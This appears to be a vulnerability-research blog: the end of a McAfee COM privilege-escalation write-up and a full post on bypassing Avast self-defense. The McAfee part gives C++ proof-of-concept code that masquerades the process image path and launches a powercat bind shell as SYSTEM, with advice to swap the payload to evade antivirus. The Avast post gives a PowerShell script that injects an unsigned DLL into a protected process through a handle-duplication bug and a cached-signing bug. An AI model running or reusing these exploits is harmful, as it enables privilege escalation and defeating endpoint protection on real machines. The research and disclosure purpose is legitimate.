}

Thus, in order to bypass self-defense, it is necessary to call the above function MasqueradeImagePath with path to any McAfee signed binary as argument before the first COM proxy call is made:

constexpr auto McLaunchExePath =
    LR"(C:\Program Files\McAfee\CoreUI\Launch.exe)"; // Your/path/to/Launch.exe
MasqueradeImagePath(McLaunchExePath);

0x07: Exploitation

Summarizing all the steps together, it turns out that for successful exploitation we need to do the following:

  1. Instantiate CoManageOem Class COM-object in McAWFwk service, get a marshalled pointer to it and query IMcClassFactory interface to factory with ::CoGetClassObject(77b97c6a-cd4e-452c-8d99-08a92f1d8c83, …, fd542581-722e-45be-bed4-62a1be46af03, &pMcClassFactory);
  2. Masquarade PEB to bypass ProxyStub check with MasqueradeImagePath;
  3. Create incapsulated COM-object ManageOem Class, get a marshalled pointer to it and query IManageOem interface to object with pMcClassFactory->InternalCreateObject(9b6c414a-799d-4506-87d1-6eb78d0a3580, &pManageOem);
  4. Call IManageOem::RunProgram to run shell bind TCP listener on localhost:12345 with powershell.exe powercat.ps1 with pManageOem->RunProgram(“powershell.exe”, “. .\powercat.ps1;powercat -l -p 12345 -ep”);
  5. Connect to listener and execute shell commands as SYSTEM with . .\powercat.ps1;powercat -c 127.0.0.1 -p 12345.

Here is a shortened version of the code for exploiting the vulnerability, you can see full version of the PoC on the github:

constexpr auto McLaunchExePath =
    LR"(C:\Program Files\McAfee\CoreUI\Launch.exe)"; // Your/path/to/Launch.exe

class __declspec(uuid("fd542581-722e-45be-bed4-62a1be46af03")) IMcClassFactory :
    public IUnknown
{
public:
    virtual HRESULT __stdcall InternalCreateObject(
        _In_ REFIID riid,
        _COM_Outptr_ void **ppvObject);
};

class __declspec(uuid("9b6c414a-799d-4506-87d1-6eb78d0a3580")) IManageOem :
    public IDispatch
{
public:
    virtual HRESULT Proc7(/* Stack Offset: 8 */ /*[Out]*/ BSTR *p0);
    virtual HRESULT Proc8(/* Stack Offset: 8 */ /*[Out]*/ BSTR *p0);
    virtual HRESULT Proc9(/* Stack Offset: 8 */ /*[Out]*/ BSTR *p0);
    virtual HRESULT Proc10(/* Stack Offset: 8 */ /*[Out]*/ BSTR *p0);
    virtual HRESULT Proc11(/* Stack Offset: 8 */ /*[Out]*/ short *p0);
    virtual HRESULT Proc12(/* Stack Offset: 8 */ /*[In]*/ short p0);
    virtual HRESULT Proc13(
        /* Stack Offset: 8 */ /*[In]*/ BSTR p0,
        /* Stack Offset: 16 */ /*[Out]*/ BSTR *p1);
    virtual HRESULT RunProgram(
        /* Stack Offset: 8 */ /*[In]*/ BSTR bstrExePath,
        /* Stack Offset: 16 */ /*[In]*/ BSTR bstrCmdLine,
        /* Stack Offset: 24 */ /*[Out]*/ /* ENUM16 */ int *returnCode);
    /* Other methods */
};

_COM_SMARTPTR_TYPEDEF(IMcClassFactory, __uuidof(IMcClassFactory));
_COM_SMARTPTR_TYPEDEF(IManageOem, __uuidof(IManageOem));

int main()
{
    try
    {
        HRESULT hr = ::CoInitializeEx(0, COINIT_MULTITHREADED);
        if (FAILED(hr))
            throw std::runtime_error("CoInitializeEx failed. Error: " + std::to_string(hr));
        auto coUninitializeOnExit = wil::scope_exit([] {::CoUninitialize(); });

        const GUID CLSID_CoManageOem =
            { 0x77b97c6a, 0xcd4e, 0x452c, { 0x8d, 0x99, 0x08, 0xa9, 0x2f, 0x1d, 0x8c, 0x83 } };
        IMcClassFactoryPtr pMcClassFactory;

        hr = ::CoGetClassObject(
            CLSID_CoManageOem,
            CLSCTX_LOCAL_SERVER,
            nullptr,
            IID_PPV_ARGS(&pMcClassFactory));
        if (FAILED(hr))
            throw std::runtime_error("CoGetClassObject failed. Error: " + std::to_string(hr));

        const auto thisModulePath = fs::path(wil::GetModuleFileNameW<std::wstring>(NULL));
        auto thisModuleParentDirectoryPath = thisModulePath.parent_path();

        auto mcAfeeSignedImagePath = McLaunchExePath;
        MasqueradeImagePath(mcAfeeSignedImagePath);

        IManageOemPtr pManageOem;

        hr = pMcClassFactory->InternalCreateObject(
            __uuidof(pManageOem), reinterpret_cast<LPVOID *>(&pManageOem));
        if (FAILED(hr))
            throw std::runtime_error("InternalCreateObject failed. Error: " + std::to_string(hr));

        auto cmdLineString = std::wstring(LR"(-nop -ep bypass -c ". )") + (thisModuleParentDirectoryPath / L"powercat.ps1").wstring() + LR"(;powercat -l -p 12345 -ep")";

        auto exePath = ::SysAllocString(LR"(C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe)");
        auto cmdLine = ::SysAllocString(cmdLineString.c_str());
        auto freeBstrStringsOnExit =
            wil::scope_exit([exePath, cmdLine] { ::SysFreeString(exePath); ::SysFreeString(cmdLine); });

        int errorCode;

        hr = pManageOem->RunProgram(exePath, cmdLine, &errorCode);
        if (FAILED(hr))
            throw std::runtime_error("RunProgram failed. Error: " + std::to_string(hr));
    }
    catch (const std::exception &e)
    {
        std::cerr << "Exception: " << e.what() << std::endl;
        return -1;
    }

    return 0;
}

And below is demo of the PoC:

Note: Recently AV have been detecting “powercat” and quarantining it. So for the demonstration purposes, the script must be added to the exclusions, and to work in real life, the payload must be changed to something slightly less famous.

0x08: Conclusion

As you can see, the reported vulnerability is quite simple, but not obvious in terms of its search, discovery and exploitation. And to simplify the task of searching for vulnerabilities in COM-objects, a modern, powerful and flexible tooling comes to the rescue - OVDN. I hope this post will help you learn OVDN and start using it.

In addition, you can notice that the vulnerability wouldn’t have been found if we had stopped at a static analysis of the attack surface. Therefore it’s always important to check your expectations, based on static attack surface analysis, with a dynamic test. Results will surprise you :)

0x09: Disclosure Timeline

  • 2020-11-03 Initial report sent to McAfee.
  • 2020-11-04 Initial response from McAfee stating they’re being reviewed it.
  • 2020-11-24 McAfee triaged the issue reported as a valid issue and is starting work on a fix.
  • 2021-02-10 McAfee releases patched version of product and published the security bulletin.
  • 2021-05-18 This report has been disclosed.

Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass

8 December 2022 at 08:00

0x00: Introduction

Sometimes ago I’ve researched Avast Free Antivirus (post about found vulnerabilities coming soon), and going through the chain of exploitation I needed to bypass self-defense mechanism. Since antivirus self-defense isn’t, in my opinion, a security boundary, bypassing this mechanism isn’t a vulnerability, and therefore I didn’t consider it so interesting to write about it in my blog. But when I stumbled upon the post by Yarden Shafir, I decided that this post could still be useful to someone. Hope you’ll enjoy reading it!

TL;DR: In this post I’ll show Avast self-defense bypass, but I’ll focus not on the result, but on the process: on how I learned how the security feature is implemented, discovered a new undocumented way to intercept all system calls without a hypervisor and PatchGuard triggered BSOD, and, finally, based on the knowledge gained, implemented a bypass.

0x01 Self-Defense Overview

Every antivirus (AV) self-defense is a proprietary undocumented mechanism, so no official documentation exists. However, I will try to guide you through the most important common core aspects. The details here should be enough to understand the next steps of the research.

Typical self-protection of an antivirus is a mechanism similar in purpose to Protected Process Light (PPL): developers try to move product processes into their own security domain, but without using special certificates (protected process (light) verification OID in EKU), to make it impossible for an attacker to tamper and terminate their own processes. That is, self-protection is similar in function to PPL, but is not a part or extension of it - EPROCESS.Protection doesn’t contain flags set by AV and therefore RtlTestProtectedAccess cannot prevent access to secured objects. Therefore, developers on one’s own have to:

  1. Assign and manage process trust tags (on creating process, on making suspicious actions);
  2. Intercept operating system (OS) operations that are important from the point of view of invasive impact (opening processes, threads, files for writing) and check if they violate the rules of the selected policy.

And if everything is simple and clear with the first point - what bugs to look for there (e.g. CVE-2021-45339), then the second point requires clarification. What and how do antiviruses intercept? Due to PatchGuard and compatibility requirements, developers have rather poor options, namely, to use only limited number of documented hooks. And there are not so many that can help defend the process:

  1. Ob-Callbacks - prevent opening for write process, thread;
  2. Driver Minifilter - prevents writing to product’s files;
  3. Some user-mode hooks - other preventions.

I’m not going to delve into detail of how this works under the hood, but if you’re not familiar with these mechanisms, I encourage you to follow the links above. On this, we consider the gentle introduction into the self-defense of the antivirus over and we can proceed to the research.

0x02 Probing Avast Self-Defense

When you need to interact with OS objects, NtObjectManager is an excellent choice. This is PowerShell module written by James Forshaw, and is a powerful wrapper for a very large number of OS APIs. With it, you can also check how processes are protected by self-defense, whether AV driver mechanisms give more access than they should. And I started with a simple opening of the Avast’s UI process AvastUI.exe:

Open process AvastUI.exe

The picture above shows that in general everything works predictably - WRITE-rights are “cut” (1). It’s a bit dangerous that they leave the VmRead (2) access right, but it’s not so easy to exploit, so I decided to look further:

Copy handle of process AvastUI.exe

I tried to duplicate the restricted handle with permissions up to AllAccess (1) and surprisingly it worked, although the trick is pretty trivial. Having received a handle with write permissions, in the case of implementing self-defense based on Ob-Callbacks, nothing restricts the attacker from performing destructive actions aimed at the protected process. Because the access check and Ob-Callbacks only happen once when the handle is created, and they aren’t involved on subsequent syscalls using acquired handle. Here you can inject, but for the test it is enough just to terminate the process, which I did. The result was unexpected - the process could not terminate (2), an access error occurred, although my handle should have allowed the requested action to be performed.

It is obvious that somehow AV interferes with the termination of the process and prohibits it from doing so. And this is done not at the level of handles by Ob-Callbacks, but already at the API call. It means that TerminateProcess is intercepted somewhere. I checked to see if it was a usermode hook and it turned out that it wasn’t. Strange and interesting…

0x03 Researching Syscall Hook

First of all, I studied the existing ways to intercept syscalls. This is widely known that system call hooking is impossible on x64 systems since 2005 due PatchGuard. But obviously Avast intercepts. Suddenly I missed something? I found a couple of interesting articles (here and here), but all these tricks were undocumented and confirmed that in modern Windows syscall intercepting isn’t a documented feature, and is formally inaccessible even for antiviruses.

Then I traced an aforementioned syscall (TerminateProcess on AvastUI.exe) and found that before each call to the syscall handler from SSDT, PerfInfoLogSysCallEntry call occurs, which replaces the address of the handler on the stack (the handler is stored on the stack, then PerfInfoLogSysCallEntry is called, and then it is taken off the stack and executed):

Call PerfInfoLogSysCallEntry

In the screenshot above, you can see that we are in the syscall handler (1), but even before routing to a specific handler. The kernel code puts the address of the process termination handler (nt!NtTerminateProcess) onto the stack at offset @rsp + 0x40h (2), then PerfInfoLogSysCallEntry (3) is called, after returning from the call, the handler address is popped back from the stack (4) and the handler is directly called (5) .

And if you follow the code further, then after calling PerfInfoLogSysCallEntry you can see the following picture:

Call replaced syscall

The address aswbidsdriver + 0x20f0 from the Avast driver (3) appears in the @rax register, and instead of the original handler, the transition occurs to it (2).

This syscall interception technique is not similar to the mentioned above. But already now we see that some “magic” happens in the function PerfInfoLogSysCallEntry and the name of this function is unique enough to try to search for information on it in Google.

The first result in the search results leads to the InfinityHook project, which just implements x64 system calls intercepts. What luck! 😉 You can read in detail how it works on the page README.md, and here I’ll give the most important:

At +0x28 in the _WMI_LOGGER_CONTEXT structure, you can see a member called GetCpuClock. This is a function pointer that can be one of three values based on how the session was configured: EtwGetCycleCount, EtwpGetSystemTime, or PpmQueryTime

The “Circular Kernel Context Logger” context is searched by signature, and its pointer to GetCpuClock is replaced in it. But there is one problem, namely: in the latest OS this code doesn’t work. Why? The project has the issue, from which it can be understood that the GetCpuClock member of the _WMI_LOGGER_CONTEXT structure is no longer a function pointer, but is a regular flag. We can check this by looking at the memory of the object in Windows 11, and indeed nothing can be changed in this class member. Instead of a function pointer we can observe an unsigned 8-bit integer:

GetCpuClock member

Then how do they take control? I set a data access breakpoint on modifying the address of the system handler inside PerfInfoLogSysCallEntry (something like “ba w8 /t @$thread @rsp + 40h”) to see what specific code is replacing the original syscall handler:

Replace original syscall

The screenshot above shows that the code from the aswVmm module at offset 0xdfde (1) replaces the address of the syscall handler on the stack (2) with the address aswbidsdriver + 0x20f0 (3). If we further reverse why this code is called in EtwpReserveTraceBuffer, we can see that the nt!HalpPerformanceCounter + 0x70 handler is called when logging the ETW event:

HalpPerformanceCounter calls QueryCounter

And accordingly, when checking the value by offset in this undocumented structure (there are rumors that at the offset is a member QueryCounter of the structure), you can make sure that there is the Avast’s symbol:

HalpPerformanceCounter.QueryCounter

Now it became clear how the interception of syscalls is implemented. I searched the Internet and found some public information about this kind of interception here and even the code that implements this approach. In this code you can see how you can find the private structure nt!HalpPerformanceCounter and if you describe it step by step, you get the following:

  1. Find the _WMI_LOGGER_CONTEXT of the Circular Kernel Context Logger ETW provider by searching for the signature of the EtwpDebuggerData global variable in the .data section of the kernel image. Further, the knowledge is used that after this variable there is an array of providers and the desired one has an index of 2;
  2. Next the provider’s flags are configured for syscall logging. And the flag is set to use KeQueryPerformanceCounter, which in turn will call HalpPerformanceCounter.QueryCounter;
  3. HalpPerformanceCounter.QueryCounter is directly replaced. To do this, this variable should be found: the KeQueryPerformanceCounter function that uses it is disassembled and the address of the variable is extracted from it by signature. Next, a member of an undocumented structure is replaced by a hook;
  4. The provider starts if it was stopped before.

0x04 Self-Defense Bypass

Now we know that Avast implements self-defense by intercepting syscalls in the kernel and understand how these interceptions are implemented. Inside the hooks, the logic is obviously implemented to determine whether to allow a specific process to execute a specific syscall with these parameters, for example: can the Maliscious.exe process execute TerminateProcess with a handle to process AvastUI.exe. How can we overcome this defense? I see 3 options:

  1. Break the hooks themselves:
    • The replaced HalpPerformanceCounter.QueryCounter is called not only in syscall handling, but also on other events. So the Avast driver somehow distinguishes these cases. You can try to call a syscall in such a way that the Avast driver does not understand that it is a syscall and does not replace it with its own routine;
    • Or turn off hooking.
  2. Find a bug in the Avast logic for determining prohibited operations (for example, find a process from the list of exceptions and mimic it);
  3. Use syscalls that are not intercepted.

The last option seems to be the simplest, since the developers definitely forgot to intercept and prohibit some important function. If this approach fails, then we can try harder and try to implement point 1 or 2.

To understand if the developers have forgotten some function, it is necessary to enumerate the names of the functions that they intercept. If you look at the xref to the function aswbidsdriver + 0x20f0, to which control is redirected instead of the original syscall handler according to the screenshot above, you can see that its address is in some array along with the name of the syscall being intercepted. It looks like this:

Hooked API array

It is logical to assume that if you go through all the elements of this array, you can get the names of all intercepted system calls. By implementing this approach, we get the following list of system calls that Avast intercepts, analyzes, and possibly prohibits from being called:

NtContinue
NtSetInformationThread
NtSetInformationProcess
NtWriteVirtualMemory
NtMapViewOfSection
NtMapViewOfSectionEx
NtResumeThread
NtCreateEvent
NtCreateMutant
NtCreateSemaphore
NtOpenEvent
NtOpenMutant
NtOpenSemaphore
NtQueryInformationProcess
NtCreateTimer
NtOpenTimer
NtCreateJobObject
NtOpenJobObject
NtCreateMailslotFile
NtCreateNamedPipeFile
NtAddAtom
NtFindAtom
NtAddAtomEx
NtCreateSection
NtOpenSection
NtProtectVirtualMemory
NtOpenThread
NtSuspendThread
NtTerminateThread
NtTerminateProcess
NtSuspendProcess
NtNotifyChangeKey
NtNotifyChangeMultipleKeys

Let me remind you that initially we wanted to bypass self-defense, and for the purposes of a quick demonstration, we tried to simply kill the process. But now back to the original plan - injection. We need to find a way to inject that simply does not use the functions listed above. That’s all! 😉 There are a lot of injection methods and there are many resources where they are described. I found a rather old, but still relevant, list in the Elastic’s article “Ten process injection techniques: A technical survey of common and trending process injection techniques” (after completing this research, I found another interesting post “‘Plata o plomo’ code injections/execution tricks”, highly recommend post and blog). There are the most popular injection techniques in Windows OS. So which of these can be applied so that it works and Avast’s self-defense cannot prevent the code from being injected?

From the intercepted syscalls, it is clear that the developers seem to have read this article and took care of mitigating the injection into processes. For example, the very first classical injection “CLASSIC DLL INJECTION VIA CREATEREMOTETHREAD AND LOADLIBRARY” is impossible. Although the name of the technique contains only CreateRemoteThread and LoadLibrary, WriteProcessMemory is still needed there, and this is a bottleneck in our case - Avast intercepts NtWriteVirtualMemory, so the technique will not work in its original form. But what if you do not write anything to the remote process, but use the strings existing in it? I got the following idea:

  1. Find in the process memory (there is a handle and there are no interceptions of such actions) a string representing the path where an attacker can write his module. It seemed to me the most reliable way to look in PEB among the environment variables for a string like “LOCALAPPDATA=C:\Users\User\AppData\Local”, so this path is definitely writable and the memory will not be accidentally freed at runtime, i.e. the exploit will be more reliable;
  2. Copy module to inject to C:\Users\User\AppData\Local.dll;
  3. Using the handle copying bug, get all access handle to process AvastUI.exe;
  4. Find the address of kernel32!LoadLibraryA (for this, thanks to KnownDlls, you don’t even need to read the memory, although we can);
  5. Call CreateRemoteThread (it is not intercepted) with procedure address of LoadLibraryA and argument - string “C:\Users\User\AppData\Local”. Since the path does not end with “.dll”, according to the documentation, LoadLibraryA itself adds a postfix;
  6. Profit!

If this scenario is expressed in PowerShell code, then the following will be obtained (in addition to the previously mentioned NtObjectManager, the script uses the Search-Memory cmdlet from the module PSMemory):

$avastUIs = Get-Process -Name AvastUI
$avastUI = $avastUIs[0]

$localAppDataStrings = $avastUI | Search-Memory -Values @{String='LOCALAPPDATA=' + $env:LOCALAPPDATA}
$pathAddress = $localAppDataStrings.Group[0].Address + 'LOCALAPPDATA='.Length  #[1]

Copy-Item -Path .\MessageBoxDll.dll -Destination ($env:LOCALAPPDATA + '.dll') #[2]

$process = Get-NtProcess -ProcessId $avastUI.Id
$process2 = Copy-NtObject -Object $process -DesiredAccess GenericAll #[3]

$kernel32Lib = Import-Win32Module -Path 'kernel32.dll'
$loadLibraryProc = Get-Win32ModuleExport -Module $kernel32Lib -ProcAddress 'LoadLibraryA' #[4]

$thread = New-NtThread -StartRoutine $loadLibraryProc -Argument $pathAddress -Process $process2 #[5]

And if we run this code, then… Nothing will happen. Rather, a thread will be created, it will try to load the module, but it will not load it, and the worst thing is the loading code, based on the call stack in ProcMon, is intercepted by aswSP.sys driver (Avast Self Protection) and judging by the access to directories using CI.dll it tries to check the signature of the module:

LoadLibrary failed

It’s incredible! Avast not only uses undocumented syscall hooks, but also uses the undocumented kernel-mode library CI.dll to validate the signature in the kernel. This is a very brave and cool feature, but for us it brings problems: we either need to change the injection scheme to fileless, or now look for a bug in the signature verification mechanism as well. I chose the second.

0x05 Cached Signing Bug

AvastUI.exe is an electron based application and therefore has a specific process model – one main process and several render processes:

AvastUI process model

And the fact is that in the case of an unsuccessful injection attempt in the previous section, we tried to inject code into the main process, but then, in the process of thinking, I tried to restart the script by specifying child processes as a target and… The injection worked.

AvastUI pwned

And if we then try to inject again into the main process, then we will succeed and no signature checks will be performed:

LoadLibrary succedeed

It’s strange, but cool that the injection works. And this means that the article is nearing completion. 😊 But I still want to understand what’s going on.

After loading the test unsigned library by the renderer process, Kernel Extended Attribute $KERNEL.PURGE.ESBCACHE is added to the file:

$f = Get-NtFile -Path ($env:LOCALAPPDATA + '.dll') -Win32Path -Access GenericRead -ShareMode Read
$f.GetEa()

Entries                                                     Count
-------                                                     -----
{Name: $KERNEL.PURGE.ESBCACHE - Data Size: 69 - Flags None}     1

This is a special attribute that can only be set from the kernel using the FsRtlSetKernelEaFile function and is removed whenever the file is modified. CI stores in this attribute the status of the signature verification, and if it is present, then the re-verification does not occur, but the result of the previous one is reused. Thus, it is obvious that when the module is loaded into the render process, there is a bug in the self-protection driver (probably aswSP.sys) (in this article, we will not figure out which one, but the reader himself can look in ProcMon for the callstack of the SetEAFile operation on the file and reverse why it is invoked) which causes a Kernel Extended Attribute to be set on an unsigned file with validated signature information for CI. And after that, this file can be loaded into any other process that uses the results of the previous “signature check”. Let’s see what is written in the attribute (NtObjectManager will help us here again):

$f.GetCachedSigningLevelFromEa()

Version             : 3
Version2            : 2
USNJournalId        : 133143369490576857
LastBlackListTime   : 4/6/2022 2:40:59 PM
ExtraData           : {Type DGPolicyHash - Algorithm Sha256 - Hash 160348839847BC9E112709549A0739268B21D1380B9D89E0CF7B4EB68CE618A7}
Flags               : 32770
SigningLevel        : DeviceGuard
Thumbprint          :
ThumbprintBytes     : {}
ThumbprintAlgorithm : Unknown

The signature of the unsigned file is marked as valid with a DeviceGuard (DG) level, so it’s understandable why the main process loads it. In addition, this bug may allow unsigned code to be executed on a DG system. Although code need to be already executed to trigger bugs, this bug can be used as a stage in the exploitation chain for executing arbitrary code on the DG system.

Summing up, the script for bypassing self-defense above is valid, but it must be applied not to the AvastUI’s main process, but to one of the child ones. But if you still want to inject into the main process, then it’s enough to first inject into any non-main AvastUI - this will set the Kernel EA of the unsigned file to the value of the passed signature verification and after that you can already inject this module into the main process - the presence of the attribute will inform the process, that the file is signed and it will load successfully.

After getting the ability to execute code in the context of AvastUI, we have several advantages:

  1. A larger attack surface is opened on AV interfaces - only trusted processes have access to many of them;
  2. AV most likely whitelists all actions of the code in a trusted process, for example, you can encrypt all files on the disk without interference;
  3. The user cannot terminate the trusted process, and it may already be hosting malicious code.

But more on that in future posts.

0x06 Conclusions

As a result of the work done, we have a bug in copying the process handle on the current latest version of Avast Free Antivirus (22.11.6041 build 22.11.7716.762), we know that Avast uses a kernel hook on syscalls, we know how they work on a fully updated Windows 11 22H2, investigated what hooks Avast puts, developed an injection bypassing the interception mechanism, discovered signature verification in the Avast core using CI.dll functions, found a bug in setting the cached signing level, and using all this, we are finally able to inject code into the trusted AvastUI.exe process protected by antivirus.

❌
❌